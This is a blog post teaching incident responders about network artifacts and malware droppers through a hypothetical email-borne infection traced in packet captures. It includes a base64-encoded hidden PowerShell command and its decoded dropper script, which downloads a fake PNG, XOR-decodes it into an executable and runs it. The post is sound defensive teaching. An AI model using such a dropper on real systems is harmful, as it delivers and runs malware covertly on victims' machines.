Shellfish Systems and Security

Share this post

Shellfish Systems and Security
Shellfish Systems and Security
Network Artifacts And Droppers
Copy link
Facebook
Email
Notes
More

Network Artifacts And Droppers

Getting down and dirty

BowTiedCrawfish
Jun 10, 2023

Share this post

Shellfish Systems and Security
Shellfish Systems and Security
Network Artifacts And Droppers
Copy link
Facebook
Email
Notes
More
Share

Hi. Today we’ll talk about network artifacts; namely, what they are and how they are presented in the case of a malware infection. Secondly, we’ll also talk about droppers since those are a nice segue from network artifacts.

Before You Read

This is mostly an introductory post, but the following posts reference tools which will be used to discuss today’s topic. You don’t have to read them, but if you want a deeper understanding, feel free to.

  • Powershell

  • All About Tcpdump - This isn’t my post but BowTiedCyber discusses Wireshark and Tcpdump here which should give you a head start on the process of capturing network traffic.

  • RTMA Part 10 - YARA and Snort - This is paid, but it discusses HIDS and SIDS which is before the paywall.

Want to capture my packets?

What

First of all, you should know that when you download anything onto your computer, whether it be via email, HTTP, FTP, SSH, etc. you should know that it the file(s) first must go through your firewall. Hopefully, you know what a firewall is.

In a business or corporate environment, you should (hopefully) have an Intrusion Detection/Prevention System (IDS/IPS) in place. If not, get on that. IDPSs capture inbound traffic and run various scanning sequences to “detect and prevent intrusions”. No shit, eh?

Let’s grab a quote from the YARA and Snort post

IDSs operate as network systems that inspect traffic headed inwards towards a network. They protect systems on a network by alerting network administrators, in real-time, if malicious activity is detected. There are 2 types: network-based (NIDS), which lie at specific, strategic points within a network, and host-based (HIDS), which lie on individual devices or “hosts”.

If a computer gets infected, then clearly both the HIPS and NIPS failed to do their job. But now, you get to figure out what happened and write a YARA rule on it :D. Also, full packet capture (PCAP) logging is more common on an IPS solution.

Now, what is a PCAP? PCAP is the capture of the contents of the entire packet that is inbound (or outbound) of a network (or in this case, a host). If a malicious program came into the network and compromised a machine, then presumably, the IPS would log the packet that held the contents of the malicious program. The program could have bypassed the detections of the IDPS by either being packed or obfuscated.

In most cases, these programs are simple scripts or very small executables that are built in a way that prevents the IDPS from being triggered. Then, when the scripts are run (either unknowingly by an employee or detonated remotely via a zero-day exploitation), they retrieve the actual malware program from a remote host. These small retrieval programs are known as “droppers” or “loaders”.

Oftentimes these can be written in PowerShell as PowerShell’s -enc flag enables execution of base64-encoded programs, which is a common and sneaky way to get an program that can be executed into a host machine. This is also common in forensics challenges on HackTheBox. Try them out sometimes.

Why

The main thing you need to understand is that intrusion will (should) be captured, but it is up to someone like you to discover what actually got through, where it came from, and where it went. There’s even a song about that.

Lastly, learning how to read packets from tools such as Wireshark and Tcpdump are something you would definitely want to pick up on. Like I said, the virus comes from somewhere, and it goes through a firewall to get to you. Understanding how to find the needle in the networking haystack will be a great benefit in your career.

Packet analysis, in my opinion, isn’t very fun. It’s pretty grueling to sift through hundreds, thousands, maybe, in really really bad cases, millions of packets. From what I’ve learned, learning to script in a way to makes the sifting easier is invaluable.

Quick aside, this reminds me of an interview question I was given.

“If you were given thousands of files and folders and you needed to retrieve a select few files within, what would your process of retrieval look like?”

First of all, that’s a stupid question, but I answered it, and it went something like this:

“Firstly, I would immediately think of what I was looking for and then attempt to build a script around that. Doing all of that by hand would be terrible. I would first start with a simple script that would hopefully start disqualifying a series of files that are clearly not what I’m looking for. After that, then I would begin to constrain my desired inputs so that I would further and further shave off the files that are unrelated to what I was looking for. As the script increases in complexity, I would be more and more confident that what was found by the script would be a part of what I was looking for.

I think that’s a good answer even though the question was overtly broad and lacked any sort of depth. I ended up getting an offer from this company, but I turned them down in favor of the company I work for now.

End of aside.

How

I’m not going to provide .pcap files, but I’ll write a quick dropper in PowerShell so you can see what they look like. That’s fun, right?

Anyways, I would advise skimming the PowerShell post if you really interested in it.

Let’s think of this hypothetical:

There’s been an “encryption event” at WildATVs.com. IT traced it to the computer of an employee named Joe Shmoe, and they even imaged it for you to forensically analyze. Joe told the IT team he was just checking his email for the morning. He said there was nothing out of the ordinary, just that his wife emailed him a few extra pictures of the house they were planning on buying.

Enter you. WildATVs need you to figure out what the heck happened.

So, you get to work and start analyzing the machine, but it got hit with a self destruction sequence so there’s not much that survived. So, you instead need to check the PCAPs from the NIPS logs that the IT team thankfully had set up. You filter out all the inbound traffic that doesn’t go to Joe’s IP address (long story short to make this simpler). Joe said he checked his email in the morning, so you filter out anything that isn’t between 8:00 and 12:00. You run some packet analysis scripts, and you get a hit. A .eml file that was sent had this in its email attachments:

powershell -WindowStyle hidden -enc IwAgAEQAbwB3AG4AbABvAGEAZAAgAG0AYQBsAGkAYwBpAG8AdQBzACAAcAByAG8AZwByAGEAbQAgAHcAaQB0AGgAIAB0AGgAZQAgAGEAcABwAGUAYQByAGEAbgBjAGUAIABvAGYAIABhACAAUABOAEcADQAKACQAdQByAGwAIAA9ACAAIgBoAHQAdABwADoALwAvADEAMgA3AC4AMAAuADAALgAxADoAOAAwADAAOAAvAGEAXwBiAGkAZwBfAGgAbwB1AHMAZQAuAHAAbgBnACIADQAKACQAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAANAAoAJABlAG4AYwByAHkAcAB0AGUAZABCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApAA0ACgANAAoAIwAgAEQAZQBjAHIAeQBwAHQAIABpAHQAIAB3AGkAdABoACAAYQAgAGIAYQBzAGkAYwAgAHgAbwByACAAYwBpAHAAaABlAHIADQAKACQAZABlAGMAcgB5AHAAdABlAGQAQgB5AHQAZQBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABiAHkAdABlAFsAXQAgACQAZQBuAGMAcgB5AHAAdABlAGQAQgB5AHQAZQBzAC4ATABlAG4AZwB0AGgADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAHIAeQBwAHQAZQBkAEIAeQB0AGUAcwAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7AA0ACgAJACQAZABlAGMAcgB5AHAAdABlAGQAQgB5AHQAZQBzAFsAJABpAF0AIAA9ACAAJABlAG4AYwByAHkAcAB0AGUAZABCAHkAdABlAHMAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADAAeAA0ADEADQAKAH0ADQAKAA0ACgAjACAAUwBhAHYAZQAgAGkAdAAgAHQAbwAgAHQAaABlACAAdABlAG0AcAAgAGYAbwBsAGQAZQByAA0ACgAkAGQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAAPQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAuAC4AXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAcwB1ADIAbgBmAGkAZAA3AHcAbQAuAGUAeABlACIADQAKAA0ACgBbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABkAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAsACAAJABkAGUAYwByAHkAcAB0AGUAZABCAHkAdABlAHMAKQANAAoADQAKACMAIABFAHgAZQBjAHUAdABlACAAdABoAGUAIABmAGkAbABlAA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABkAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAA=

Some of you might be thinking “hm wow that’s gobbledegook”.

But, you read this article by BowTiedCrawfish, so this is something you’re familiar with.

Presumably, upon clicking the picture of the house that he thought his wife sent to load it, he inadvertently executed this PowerShell command. But, what does it do?

Let’s break it down.

  • powershell

    • This executes a PowerShell command. Wow.

  • -WindowStyle hidden

    • This hides the console window that would open in the case of PowerShell being invoked.

  • -enc

    • This is the base64 encoded script that is to be executed by PowerShell.

Now that you know that, you know that that gigantic string is actually a .ps1 file. You can then decrypt it (remember that -enc accepts little-endian UTF-16 encoded strings) and retrieve this content.

# Download malicious program with the appearance of a PNG
$url = "http://127.0.0.1:8008/a_big_house.png"
$webClient = New-Object System.Net.WebClient
$encryptedBytes = $webClient.DownloadData($url)

# Decrypt it with a basic xor cipher
$decryptedBytes = New-Object byte[] $encryptedBytes.Length
for ($i = 0; $i -lt $encryptedBytes.Length; $i++) {
	$decryptedBytes[$i] = $encryptedBytes[$i] -bxor 0x41
}

# Save it to the temp folder
$destinationPath = "$env:APPDATA\..\Local\Temp\su2nfid7wm.exe"

[System.IO.File]::WriteAllBytes($destinationPath, $decryptedBytes)

# Execute the file
Start-Process $destinationPath

In this example, a file (a_big_house.png) is saved to localhost:8008/. This “picture” is such because that is a way to thwart detection from network logs. “Oh it was just a picture, no big deal”. When in reality, the bytes of this “picture” are the encrypted contents of an executable.

After downloading the bytes, they are then ciphered with a basic xor with 0x41, and then the file is saved as a .exe to the temp directory. Lastly, the “malicious executable” is executed.

So, the .exe is saved to disk. But, remember, the self destruction sequence bricked any sort of remnants that you could analyze from the image. Now, how do you get the executable that was downloaded?

Why, back in the PCAP of course!

You already have everything in front of you. You search for incoming traffic from 127.0.0.1 (a real IP address/domain in a real scenario) and search HTTP GETs for a_big_house.png. In this packet(s) are the bytes of the downloaded executable. All you have to do is extract the packet payload, xor each byte of the .png with 0x41, and then you have the malicious program in its entirety.

Now, you can analyze the malicious executable!

But, how do you do that?

Well, that’s what the RTMA series is for.

;)

Go!

-BowTiedCrawfish

Share this post

Shellfish Systems and Security
Shellfish Systems and Security
Network Artifacts And Droppers
Copy link
Facebook
Email
Notes
More
Share

Discussion about this post

No posts

Ready for more?

© 2025 BowTiedCrawfish
Privacy ∙ Terms ∙ Collection notice
Start WritingGet the app
Substack is the home for great culture

Share

Copy link
Facebook
Email
Notes
More